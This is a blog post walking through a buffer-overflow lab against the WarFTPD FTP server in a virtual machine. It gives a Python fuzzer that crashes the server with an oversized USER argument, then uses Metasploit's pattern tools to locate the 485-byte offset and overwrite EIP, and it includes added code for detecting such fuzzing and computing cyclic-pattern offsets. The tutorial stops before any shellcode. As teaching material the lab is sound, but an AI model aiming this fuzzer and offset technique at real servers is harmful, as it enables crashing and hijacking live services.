Tuesday, 18 September 2012

BUFFER OVERFLOW: WARFTPD (NON-SEH APPLICATION)

1. Install and run WarFTPD on Windows inside VirtualBox.

2. Then make a simple fuzzer in the Python programming language and save it with the .py extension on BackTrack.
I saved it on BackTrack under the name xfuzz.py.

fuzzer script:


import socket

# The test payload: 1000 'A' bytes (0x41) sent as the FTP user name.
# (In the original listing this line was commented out, which left
# `buffer` undefined; it has to be active for the script to run.)
buffer = b"\x41" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.128', 21))   # address of the WarFTP VM, FTP control port
data = s.recv(1024)                 # read the server banner
print("sending evil data via USER command...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)                 # server reply to USER (if it is still alive)
s.send(b'PASS PASSWORD\r\n')
s.close()
print("Finish")

warning: whitespace (indentation) is significant in Python, so copy the script exactly.
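The oversized USER argument the fuzzer sends is also easy to spot from the server side. The following is an added example, not code from the original post: it runs a simple check over constructed FTP control-channel lines (the kind an FTP proxy, IDS or server log would record) and flags arguments that are far longer than any real user name, that consist of one repeated byte, or that look like a Metasploit-style cyclic pattern. The 64-byte limit, the regular expressions and the sample lines are my assumptions.

```python
"""Defender-side check for abnormal FTP USER/PASS arguments (added example)."""
import re

# Assumed limit: legitimate FTP user names are short; anything near this is suspicious.
MAX_ARG_LEN = 64

# A long run of one byte ("AAAA...", or a 0x90 NOP sled) is typical of a crash-hunting fuzzer.
_REPEATED_BYTE = re.compile(r"^(.)\1{15,}$")
# Metasploit's pattern_create output is Upper/lower/digit triplets: Aa0Aa1Aa2...
_CYCLIC_PATTERN = re.compile(r"^(?:[A-Z][a-z][0-9])+")


def analyse_command(line):
    """Return (verb, argument_length, reasons) for one FTP command line.

    `reasons` is an empty list when the line looks benign.
    """
    line = line.rstrip("\r\n")
    verb, _, arg = line.partition(" ")
    verb = verb.upper()
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
    if _REPEATED_BYTE.match(arg):
        reasons.append("argument is a repeated single byte")
    m = _CYCLIC_PATTERN.match(arg)
    if m and len(m.group(0)) >= 24:
        reasons.append("argument looks like a pattern_create cyclic pattern")
    return verb, len(arg), reasons


def scan(lines):
    """Return a list of (line_no, verb, argument_length, reasons) for flagged lines."""
    alerts = []
    for n, line in enumerate(lines, 1):
        verb, arg_len, reasons = analyse_command(line)
        if reasons:
            alerts.append((n, verb, arg_len, reasons))
    return alerts


# Constructed sample control channel: one normal login, then two fuzzer attempts.
SAMPLE_LINES = [
    "USER anonymous\r\n",
    "PASS guest@example.com\r\n",
    "USER " + "A" * 1000 + "\r\n",          # same payload as xfuzz.py
    "PASS PASSWORD \r\n",
    "USER Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2\r\n",  # pattern_create-style
]

if __name__ == "__main__":
    for n, verb, arg_len, reasons in scan(SAMPLE_LINES):
        print("line %d: %s (%d bytes): %s" % (n, verb, arg_len, "; ".join(reasons)))
```

Run against the sample, only lines 3 and 5 are reported; the normal login passes. In a real deployment the same checks would sit in front of the FTP service (proxy or IDS rule) so that a crash-hunting client is logged before the daemon falls over.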


3. To start the WarFTP server choose Properties > Start Service; the WarFTP status will then show Idle.

I tried to connect to the FTP service using nc; if it succeeds you will see something like the picture below.

Then I tried to run the fuzzer in the BackTrack console.

Watch WarFTP: if the fuzzer works and crashes the application, the WarFTP window disappears from the screen by itself.

Every time you fuzz WarFTP the application crashes and its configuration is saved to the file FtpDaemon.dat.
To re-run the WarFTP server without the error message, delete the file FtpDaemon.dat.

4. Re-run the WarFTP server and add a dummy user via User Security Properties.

Then run OllyDbg to debug the WarFTP server.

After adding the new user, repeat the fuzzing. This time the WarFTP application does not display an error message.

Then start the WarFTP application from inside OllyDbg and run the fuzzer again.

Before fuzzing:

After fuzzing:

The register window shows clearly what happens when the crash occurs.
Four registers are affected by the fuzzer: ESP, EDI, EBP, and EIP.

5. Pattern create
One of the tools in Metasploit that helps with exploit development is pattern_create.
Its purpose is to find the exact position of a string within the data the fuzzer sends to the application.

In a console, go to the folder /pentest/exploits/framework/tools

To produce one thousand bytes of pattern data, run this command:
 ./pattern_create.rb 1000 > string_pattern.txt

The output is saved as string_pattern.txt.

Open string_pattern.txt, copy the pattern and put it into xfuzz.py as the buffer.

Then run the fuzzer against WarFTP again and note the registers of the WarFTP server.

6. Pattern offset
This tool calculates how many bytes into the pattern generated by pattern_create.rb a given value (such as the one found in a register) lies.

We can see that 485 bytes are needed to reach the EIP register.
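Steps 5 and 6 rely on two Metasploit scripts written in Ruby. To show what they actually compute, here is an added Python example (my code, not the Metasploit implementation and not part of the original post) that generates the same cyclic pattern and looks an offset up in it. The key property is that the pattern is built from unique Upper/lower/digit triplets, so any 4-byte window occurs at exactly one position; and because x86 is little-endian, a register value given as hex (0x41336141) has to be byte-reversed before searching, which is what pattern_offset.rb does. The sample register value and the use of 485 as an illustration are constructed.

```python
"""Cyclic pattern generation and offset lookup (added example, not Metasploit's code)."""
import string
import struct

FULL_CYCLE = 26 * 26 * 10 * 3   # 20280 bytes before any triplet repeats


def pattern_create(length):
    """Return the first `length` characters of Aa0Aa1Aa2...Aa9Ab0Ab1... as a str."""
    if length > FULL_CYCLE:
        raise ValueError("offsets are only unique within the first %d bytes" % FULL_CYCLE)
    out = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, value):
    """Return the offset of `value` inside `pattern`, or -1 if absent.

    `value` is either the characters as seen in memory (e.g. 'Aa3A') or the
    register value in hex with a 0x prefix (e.g. '0x41336141'). The hex form is
    a little-endian dword, so it is unpacked to its byte order in memory first.
    """
    if value.lower().startswith("0x"):
        dword = int(value[2:], 16)
        needle = struct.pack("<I", dword).decode("latin-1")
    else:
        needle = value
    return pattern.find(needle)


def bytes_landing_at(pattern, offset, width=4):
    """Which pattern characters would be written over a 4-byte slot at `offset`."""
    return pattern[offset:offset + width]


if __name__ == "__main__":
    p = pattern_create(1000)             # same as ./pattern_create.rb 1000
    print(p[:30])
    # Constructed register value: 0x41336141 is 'A','a','3','A' in memory.
    print("offset of 0x41336141:", pattern_offset(p, "0x41336141"))
    # With the post's result of 485, these are the pattern bytes that overwrite EIP.
    print("bytes at offset 485:", bytes_landing_at(p, 485))
```

Because the lookup is a plain substring search on a sequence with no repeated 4-byte windows, a single crash is enough to recover the distance from the start of the buffer to the overwritten return address; that distance is what the post's value of 485 represents.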

Add this line to the script xfuzz.py:
buffer = "\x90" * 485

Once more, run the fuzzer against WarFTP and note the EIP register.

We can see that the EIP register changes to DEADBEEF.

TO BE CONTINUED...

1 comment:

  1. How do you see the crashed offset value in the server from the client side, so that you can put the value into ./pattern_offset.rb?
